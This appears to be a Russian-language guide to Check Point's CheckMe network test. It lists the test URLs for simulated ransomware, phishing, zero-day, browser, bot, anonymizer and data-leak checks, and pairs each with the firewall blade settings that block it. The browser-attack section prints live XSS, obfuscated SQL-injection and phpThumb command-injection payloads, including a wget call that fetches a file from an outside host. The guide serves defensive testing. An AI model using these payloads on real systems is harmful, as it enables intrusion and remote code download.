Ниже представлены различные атаки, которые были использованы во время имитации различных сценариев и объяснения, что нужно сделать, чтобы предотвратить атаку.
Проверка ПО для вымогательства: Этот тест загружает тестовый файл вирус (EICAR-Test-File) через вашу сеть.
• http://www.cpcheckme.com/check/testsAssets/e.txt
• https://www.cpcheckme.com/check/testsAssets/e.txt
• http://www.cpcheckme.com/check/testsAssets/e.bz2
• http://www.cpcheckme.com/check/testsAssets/e.zip
Для улучшения вашей сетевой безопасности с решением Check Point Threat Prevention, выполните следующие действия:
1. Убедитесь, что ваш Антивирус блэйд на основе Check Point использует профиль "Recommended_Profile".
2. Включите «сканирование архивов» в вашем Антивирусе (в профиле Threat Prevention).
3. Включите функцию проверки HTTPS для проверки HTTPS трафика.
Так же вы можете проверить предотвращение использования известной уязвимости Internet Explorer 8:
• http://www.cpcheckme.com/check/testsAssets/exploit_page_buffer.html
Примечание: Этот тест не поддерживается для SMB оборудования, работающего под управлением Gaia Embedded OS (600/700/1100 / 1200R / 1400).
Для улучшения вашей сетевой безопасности с решением Check Point Threat Prevention, выполните следующие действия:
1. Убедитесь, что ваш IPS блэйд включен.
2. Убедитесь, что IPS защита обновлена до актуального состояния.
3. Настройте IPS защиту «Suspicious Javascript Variable Names» в режим "Prevent"
Проверка на кражу личных данных/ Фишинговые атаки Этот тест генерирует подключения к фишинговым и вредоносным сайтам через вашу сеть.
Успешная попытка подключения свидетельствует, что вы могли бы стать жертвой фишинговой атаки и ваша личная информация может быть украдена.
CheckMe имитирует этот тест путем загрузки файла favicon.ico из следующих сайтов:
• http://guidesforworkloadautomation.com/favicon.ico
• http://98.139.236.92/favicon.ico
1. Убедитесь, что в политиках URL фильтрации запрещены категории фишинг и сайты с высоким риском, для предотвращения компьютера от этой угрозы.
2. Улучшите вашу сетевую безопастность с SandBlast Agent для браузеров.
(sk108695 — Check Point SandBlast Agent for Browsers
Проверка на атаки нулевого дня Этот тест, загружает файлы в различных форматах, которые часто используются в атаках нулевого дня.
CheckMe имитирует этот тест, загружая следующие файлы:
- http://www.cpcheckme.com/check/testsAssets/win7_64bit_big.com
- http://www.cpcheckme.com/check/testsAssets/win7_64bit_big.zip
http://www.cpcheckme.com/check/testsAssets/win7_64bit_big.pdf Для улучшения вашей сетевой безопасности с решением Check Point Threat Prevention, выполните следующие действия:
1. Активируйте Threat Emulation блэйд.
2. Активируйте Threat Extraction блэйд для удаления вредоносного содержимого из файлов.
Улучшите вашу сетевую безопастность с SandBlast Agent для браузеров.
(sk108695 — Check Point SandBlast Agent for Browsers).
Проверка атака на браузер Этот тест проверяет, защиту вашей сети от Cross-Site Scripting (XSS), инъекций SQL и инъекций команд.
CheckMe имитирует этот тест путем подключения к следующим тестовым сайтам:
• http://www.cpcheckme.com/check/testsAssets/1.aspxss=%3Cscript%3Ealert%28%221%22%29%3C%2Fscript%3E
• http://www.cpcheckme.com/check/testsAssets/1.asp?FileName=a.pdf&AppID=2&MainID=9&SecID=9&MinID=2'%20or%201%3D%2F**%2FcOnVeRt(int,(char(33)+char(126)+char(33)+(char(65)+char(66)+char(67)+char(49)+char(52)+char(53)+char(90)+char(81)+char(54)+char(50)+char(68)+char(87)+char(81)
+char(65)+char(70)+char(80)+char(79)+char(73)+char(89)+char(67)+char(70)+char(68))+char(33)+char(126)+char(33))%20
COLLATE%20SQL_Latin1_General_Cp1254_CS_AS)%E2%80%94&static=CPCheckMe&rand=1486976400823
• http://www.cpcheckme.com/check/testsAssets/1.asp?src=file.jpg&fltr%5b%5d=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg%3Afail.jpg%20%3B%20wget%20http%3A%2F%2Fbanthinghiem.vn%2Fwp-content%2Fthemes%2Fpagat.txt%20-O%20pagat.txt%20%3B%20%26phpThumbDebug%3D9&static=CPCheckMe&rand=1486976400824
Улучшите защиту вашей сети с Check Point Next Generation Threat Prevention, который включает Систему предотвращения вторжений (IPS блэйд).
Настройте IPS защиту на предотвращение угрозы Cross-Site Scripting (например "Cross-Site Scripting Scanning Attempt")
Активируйте IPS блэйд и убедитесь что IPS защита обновлена до актуального состояния.
В случае, если не представляется возможным обновить защиту IPS до последней версии, включите следующие средства защиты IPS:
• Cross-Site Scripting Scanning Attempt
• SQL Servers SQL Injection Obfuscation Techniques
• SQL Injection Scanning Attempt
• Command Injection Over HTTP
Проверка инфицирование ботом Этот тест имитирует активность бота через известный протокол Command and Control.
CheckMe имитирует этот тест, разместив:
• creditcard=1234&expyear=2017&ccv=123&pin=1234
на
• http://www.cpcheckme.com/check/testsAssets/post.html
Улучшите защиту вашей сети с
Check Point Next Generation Threat Prevention, который включает
Анти-Бот блэйд, настройки по умолчанию которого, блокируют доступ к серверам Command and Control.
Проверка на использование анонимайзеров Этот тест проверяет возможность подключения к сайтам анонимайзерам через вашу сеть.
CheckMe имитирует подключения, пытаясь получить доступ:
http://www.hidemyass.com Улучшите защиту вашей сети с
Check Point Threat Prevention, который включает
блэйд URL фильтации.
Убедитесь в том, что сайты анонимайзеры блокируются URL политиками фильтрации.
Проверка на утечки конфиденциальных данных Этот тест генерирует структурированный трафик, как номера кредитных карт (через HTTP и HTTPS) на общедоступных сайтах через вашу сеть.
Улучшите защиту вашей сети с
Data Loss Prevention (DLP) blade.
Убедитесь в том, что PCI — номера кредитных карт блокируются политики DLP.